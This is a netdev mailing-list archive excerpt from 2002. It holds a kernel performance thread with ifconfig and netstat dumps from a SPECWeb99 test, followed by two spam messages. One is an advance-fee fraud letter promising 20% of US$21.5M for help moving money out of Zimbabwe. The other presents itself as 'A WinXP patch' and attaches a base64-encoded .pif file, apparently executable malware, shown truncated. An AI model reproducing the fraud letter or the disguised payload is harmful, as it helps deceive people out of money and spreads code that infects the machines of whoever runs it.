Received: (from tcw@localhost) by tempest.prismnet.com (8.12.5/8.12.5/Submit) id g8705TYN017050; Fri, 6 Sep 2002 19:05:29 -0500 (CDT)
From: Troy Wilson
Message-Id: <200209070005.g8705TYN017050@tempest.prismnet.com>
Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000
In-Reply-To: <1031283490.3d7823228d9ed@imap.linux.ibm.com> "from Nivedita Singhvi at Sep 5, 2002 08:38:10 pm"
To: Nivedita Singhvi
Date: Fri, 6 Sep 2002 19:05:29 -0500 (CDT)
CC: jamal , linux-kernel@vger.kernel.org, netdev@oss.sgi.com
X-Mailer: ELM [version 2.4ME+ PL82 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
X-archive-position: 138
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: tcw@tempest.prismnet.com
Precedence: bulk
X-list: netdev

> ifconfig -a and netstat -rn would also be nice to have..

These counters may have wrapped over the course of the full-length
( 3 x 20 minute runs + 20 minute warmup + rampup + rampdown) SPECWeb run.

*******************************
* ifconfig -a before workload *
*******************************

eth0      Link encap:Ethernet  HWaddr 00:04:AC:23:5E:99
          inet addr:9.3.192.209  Bcast:9.3.192.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:208 errors:0 dropped:0 overruns:0 frame:0
          TX packets:104 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:22562 (22.0 Kb)  TX bytes:14356 (14.0 Kb)
          Interrupt:50 Base address:0x2000 Memory:fe180000-fe180038

eth1      Link encap:Ethernet  HWaddr 00:02:B3:9C:F5:9E
          inet addr:192.168.4.1  Bcast:192.168.4.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:10 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:5940 (5.8 Kb)  TX bytes:256 (256.0 b)
          Interrupt:61 Base address:0x1200 Memory:fc020000-0

eth2      Link encap:Ethernet  HWaddr 00:02:B3:A8:35:C1
          inet addr:192.168.2.1  Bcast:192.168.2.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:0 (0.0 b)  TX bytes:256 (256.0 b)
          Interrupt:54 Base address:0x1220 Memory:fc060000-0

eth3      Link encap:Ethernet  HWaddr 00:02:B3:A3:47:E7
          inet addr:192.168.3.1  Bcast:192.168.3.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:0 (0.0 b)  TX bytes:256 (256.0 b)
          Interrupt:44 Base address:0x2040 Memory:fe120000-0

eth4      Link encap:Ethernet  HWaddr 00:02:B3:A3:46:F9
          inet addr:192.168.1.1  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:784 (784.0 b)  TX bytes:256 (256.0 b)
          Interrupt:36 Base address:0x2060 Memory:fe160000-0

eth5      Link encap:Ethernet  HWaddr 00:02:B3:A3:47:88
          inet addr:192.168.5.1  Bcast:192.168.5.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:0 (0.0 b)  TX bytes:256 (256.0 b)
          Interrupt:32 Base address:0x3000 Memory:fe420000-0

eth6      Link encap:Ethernet  HWaddr 00:02:B3:9C:F5:A0
          inet addr:192.168.6.1  Bcast:192.168.6.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:64 (64.0 b)  TX bytes:256 (256.0 b)
          Interrupt:28 Base address:0x3020 Memory:fe460000-0

eth7      Link encap:Ethernet  HWaddr 00:02:B3:A3:47:39
          inet addr:192.168.7.1  Bcast:192.168.7.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:0 (0.0 b)  TX bytes:256 (256.0 b)
          Interrupt:24 Base address:0x4000 Memory:fe820000-0

eth8      Link encap:Ethernet  HWaddr 00:02:B3:A3:47:87
          inet addr:192.168.8.1  Bcast:192.168.8.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:0 (0.0 b)  TX bytes:256 (256.0 b)
          Interrupt:20 Base address:0x4020 Memory:fe860000-0

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:56 errors:0 dropped:0 overruns:0 frame:0
          TX packets:56 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:5100 (4.9 Kb)  TX bytes:5100 (4.9 Kb)

******************************
* ifconfig -a after workload *
******************************

eth0      Link encap:Ethernet  HWaddr 00:04:AC:23:5E:99
          inet addr:9.3.192.209  Bcast:9.3.192.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3434 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1408 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:336578 (328.6 Kb)  TX bytes:290474 (283.6 Kb)
          Interrupt:50 Base address:0x2000 Memory:fe180000-fe180038

eth1      Link encap:Ethernet  HWaddr 00:02:B3:9C:F5:9E
          inet addr:192.168.4.1  Bcast:192.168.4.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:74893662 errors:3 dropped:3 overruns:0 frame:0
          TX packets:100464074 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:1286843881 (1227.2 Mb)  TX bytes:2106085286 (2008.5 Mb)
          Interrupt:61 Base address:0x1200 Memory:fc020000-0

eth2      Link encap:Ethernet  HWaddr 00:02:B3:A8:35:C1
          inet addr:192.168.2.1  Bcast:192.168.2.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:0 (0.0 b)  TX bytes:256 (256.0 b)
          Interrupt:54 Base address:0x1220 Memory:fc060000-0

eth3      Link encap:Ethernet  HWaddr 00:02:B3:A3:47:E7
          inet addr:192.168.3.1  Bcast:192.168.3.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:50054881 errors:0 dropped:0 overruns:0 frame:0
          TX packets:67122955 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:3730406436 (3557.5 Mb)  TX bytes:3034087396 (2893.5 Mb)
          Interrupt:44 Base address:0x2040 Memory:fe120000-0

eth4      Link encap:Ethernet  HWaddr 00:02:B3:A3:46:F9
          inet addr:192.168.1.1  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:48 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:7342 (7.1 Kb)  TX bytes:256 (256.0 b)
          Interrupt:36 Base address:0x2060 Memory:fe160000-0

eth5      Link encap:Ethernet  HWaddr 00:02:B3:A3:47:88
          inet addr:192.168.5.1  Bcast:192.168.5.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:149206960 errors:2861 dropped:2861 overruns:0 frame:0
          TX packets:200247016 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:2530107402 (2412.8 Mb)  TX bytes:3331495154 (3177.1 Mb)
          Interrupt:32 Base address:0x3000 Memory:fe420000-0

eth6      Link encap:Ethernet  HWaddr 00:02:B3:9C:F5:A0
          inet addr:192.168.6.1  Bcast:192.168.6.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:13 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:832 (832.0 b)  TX bytes:640 (640.0 b)
          Interrupt:28 Base address:0x3020 Memory:fe460000-0

eth7      Link encap:Ethernet  HWaddr 00:02:B3:A3:47:39
          inet addr:192.168.7.1  Bcast:192.168.7.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:151162569 errors:2993 dropped:2993 overruns:0 frame:0
          TX packets:202895482 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:2673954954 (2550.0 Mb)  TX bytes:2456469394 (2342.6 Mb)
          Interrupt:24 Base address:0x4000 Memory:fe820000-0

eth8      Link encap:Ethernet  HWaddr 00:02:B3:A3:47:87
          inet addr:192.168.8.1  Bcast:192.168.8.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:0 (0.0 b)  TX bytes:256 (256.0 b)
          Interrupt:20 Base address:0x4020 Memory:fe860000-0

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:100 errors:0 dropped:0 overruns:0 frame:0
          TX packets:100 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:8696 (8.4 Kb)  TX bytes:8696 (8.4 Kb)

***************
* netstat -rn *
***************

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
192.168.7.0     0.0.0.0         255.255.255.0   U        40 0          0 eth7
192.168.6.0     0.0.0.0         255.255.255.0   U        40 0          0 eth6
192.168.5.0     0.0.0.0         255.255.255.0   U        40 0          0 eth5
192.168.4.0     0.0.0.0         255.255.255.0   U        40 0          0 eth1
192.168.3.0     0.0.0.0         255.255.255.0   U        40 0          0 eth3
192.168.2.0     0.0.0.0         255.255.255.0   U        40 0          0 eth2
192.168.1.0     0.0.0.0         255.255.255.0   U        40 0          0 eth4
9.3.192.0       0.0.0.0         255.255.255.0   U        40 0          0 eth0
192.168.8.0     0.0.0.0         255.255.255.0   U        40 0          0 eth8
127.0.0.0       0.0.0.0         255.0.0.0       U        40 0          0 lo
0.0.0.0         9.3.192.1       0.0.0.0         UG       40 0          0 eth0

From niv@us.ibm.com Fri Sep 6 17:14:11 2002
Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 17:14:17 -0700 (PDT)
Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g870EBtG022901 for ; Fri, 6 Sep 2002 17:14:11 -0700
Received: from northrelay01.pok.ibm.com (northrelay01.pok.ibm.com [9.56.224.149]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g870IIEG054058; Fri, 6 Sep 2002 20:18:18 -0400
Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by northrelay01.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g870IFtW104618; Fri, 6 Sep 2002 20:18:16 -0400
Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id 6F3613FE06; Fri, 6 Sep 2002 20:18:17 -0400 (EDT)
Received: by imap.linux.ibm.com (Postfix, from userid 99) id B66D123C00D; Fri, 6 Sep 2002 20:18:16 -0400 (EDT)
Received: from 9.47.18.15 ( [9.47.18.15]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Fri, 6 Sep 2002 17:18:16 -0700
Message-ID: <1031357896.3d7945c875a7e@imap.linux.ibm.com>
Date: Fri, 6 Sep 2002 17:18:16 -0700
From: Nivedita Singhvi
To: Troy Wilson
Cc: jamal , linux-kernel@vger.kernel.org, netdev@oss.sgi.com
Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000
References: <200209062356.g86Nu4Gk016944@tempest.prismnet.com>
In-Reply-To: <200209062356.g86Nu4Gk016944@tempest.prismnet.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.0
X-Originating-IP: 9.47.18.15
X-archive-position: 139
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: niv@us.ibm.com
Precedence: bulk
X-list: netdev

Quoting Troy Wilson :

> > Do you have any stats from the hardware that could show
> > retransmits etc;

Troy,

Are tcp_sack, tcp_fack, tcp_dsack turned on?

thanks,
Nivedita

From tcw@tempest.prismnet.com Fri Sep 6 17:23:22 2002
Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 17:23:23 -0700 (PDT)
Received: from tempest.prismnet.com (root@tempest.prismnet.com [209.198.128.6]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g870NLtG023316 for ; Fri, 6 Sep 2002 17:23:21 -0700
Received: from tempest.prismnet.com (tcw@localhost [127.0.0.1]) by tempest.prismnet.com (8.12.5/8.12.5) with ESMTP id g870RXwf017283; Fri, 6 Sep 2002 19:27:33 -0500 (CDT) (envelope-from tcw@tempest.prismnet.com)
Received: (from tcw@localhost) by tempest.prismnet.com (8.12.5/8.12.5/Submit) id g870RXFc017282; Fri, 6 Sep 2002 19:27:33 -0500 (CDT)
From: Troy Wilson
Message-Id: <200209070027.g870RXFc017282@tempest.prismnet.com>
Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000
In-Reply-To: <1031357896.3d7945c875a7e@imap.linux.ibm.com> "from Nivedita Singhvi at Sep 6, 2002 05:18:16 pm"
To: Nivedita Singhvi
Date: Fri, 6 Sep 2002 19:27:33 -0500 (CDT)
CC: jamal , linux-kernel@vger.kernel.org, netdev@oss.sgi.com
X-Mailer: ELM [version 2.4ME+ PL82 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
X-archive-position: 140
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: tcw@tempest.prismnet.com
Precedence: bulk
X-list: netdev

> Are tcp_sack, tcp_fack, tcp_dsack turned on?

tcp_fack and tcp_dsack are on, tcp_sack is off.

- Troy

From jdmulete@netscape.net Sat Sep 7 04:54:35 2002
Received: with ECARTIS (v1.0.0; list netdev); Sat, 07 Sep 2002 04:54:40 -0700 (PDT)
Received: from oss.sgi.com (node-c-07f1.a2000.nl [62.194.7.241]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g87BsWtG001071 for ; Sat, 7 Sep 2002 04:54:34 -0700
Message-Id: <200209071154.g87BsWtG001071@oss.sgi.com>
From: "EDWARD MULETE"
Date: Sat, 07 Sep 2002 13:58:44
To: netdev@oss.sgi.com
Subject: URGENT ASSISTANCE
MIME-Version: 1.0
Content-Type: text/plain;charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-archive-position: 141
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jdmulete@netscape.net
Precedence: bulk
X-list: netdev

ATTN:

I am Edward Mulete JR. the son of Mr. STEVE MBEKI MULETE from Zimbabwe. I am sorry this mail Will surprise you, though we do not know, my mother Mrs. Clara Got your contact through her private search. Due to the current war against white farmers in Zimbabwe and the support of President Robert Mugabe to Claim all white owned farms in our country to gain Favor for re-election. All white farmers were asked to Surrender their farms to the government for Re-distribution and infact to his political party Members and my father though black was the treasury of the farmers association and a strong member of an Opposition party that did not support the president Idea. He then ordered his party members and the police Under his pay row to invade my father's farm and burn Down everything in the farm.
They killed my Father and took away a lot of items from his farm. After the death of my father, our local pastor and a Close friend of my father handed us over will Documents with instructions from my father that we Should leave Zimbabwe incase anything happen to him. The will Documents has a certificate of deposit, confirming a deposit Kept in custody for us in a security company unknown To the company that the content is money hence it was deposited as Personal belongings and ensure that we do not remain here as we could Easily be found by his enemies. The total amount is US$21.5M.We are therefore soliciting for Your assistance to help us move the fund out of Zimbabwe, as our fate and future is far from reality, hence this mail to you. The president's present ban of International Press into Zimbabwe and the drop from office of the Finance Minister to avoid giving white farmers fund Transfer Clearance above US$1M is just a few of the Unthinkable things he is committing in my Country. I have tried to reach my father's close friend Mr. John Casahans from Australia also a farmer who was Leaving in Zimbabwe with us but left with his family Late last year following this ugly development to no Avail. Should you be interested to help us, contact me Immediately via email for easy communication and I Will furnish you with the time frame and modalities of the transaction. We have concluded a wonderful plan of Caring out the transfer within two weeks. Please note that This transaction is100% confidential and risk free and will Not endanger you or us in any way. We have resolved to give you 20% Of the total sum upon confirmation of the fund in any Account of your choice were the incident of taxation will not take much tool on the money and we look Forward to coming over to your country to invest our Share and settle there. I will a private Phone so that our conversation can be 100% confidential. 
Please do not use the reply button, reply only to jdmulete7@netscape.net
Please take note. God bless you indeed as you help yourself and us.

Mr. EDWARD MULETE

PLEASE REPLY TO jdmulete7@netscape.net

From kornosz@berti.pl Sat Sep 7 06:49:22 2002
Received: with ECARTIS (v1.0.0; list netdev); Sat, 07 Sep 2002 06:49:23 -0700 (PDT)
Received: from forward.ie.com.pl (forward.ie.com.pl [213.77.58.4]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g87DnDtG004049 for ; Sat, 7 Sep 2002 06:49:14 -0700
Received: from Zvm [66.73.160.79] by forward.ie.com.pl (SMTPD32-6.06) id A00EA8C600F8; Sat, 07 Sep 2002 15:33:02 +0200
From: support
To: netdev@oss.sgi.com
Subject: A WinXP patch
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=JX9B723k1m6247sb1270X8y1Oj6xCv525579A
Message-Id: <200209071533390.SM00138@Zvm>
Date: Sat, 7 Sep 2002 15:38:03 +0200
X-archive-position: 142
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: support@sis.com.tw
Precedence: bulk
X-list: netdev

--JX9B723k1m6247sb1270X8y1Oj6xCv525579A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Hi,This is a WinXP patch
I hope you would like it.

--JX9B723k1m6247sb1270X8y1Oj6xCv525579A
Content-Type: application/octet-stream; name=Jqbf.pif
Content-Transfer-Encoding: base64
Content-ID:

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 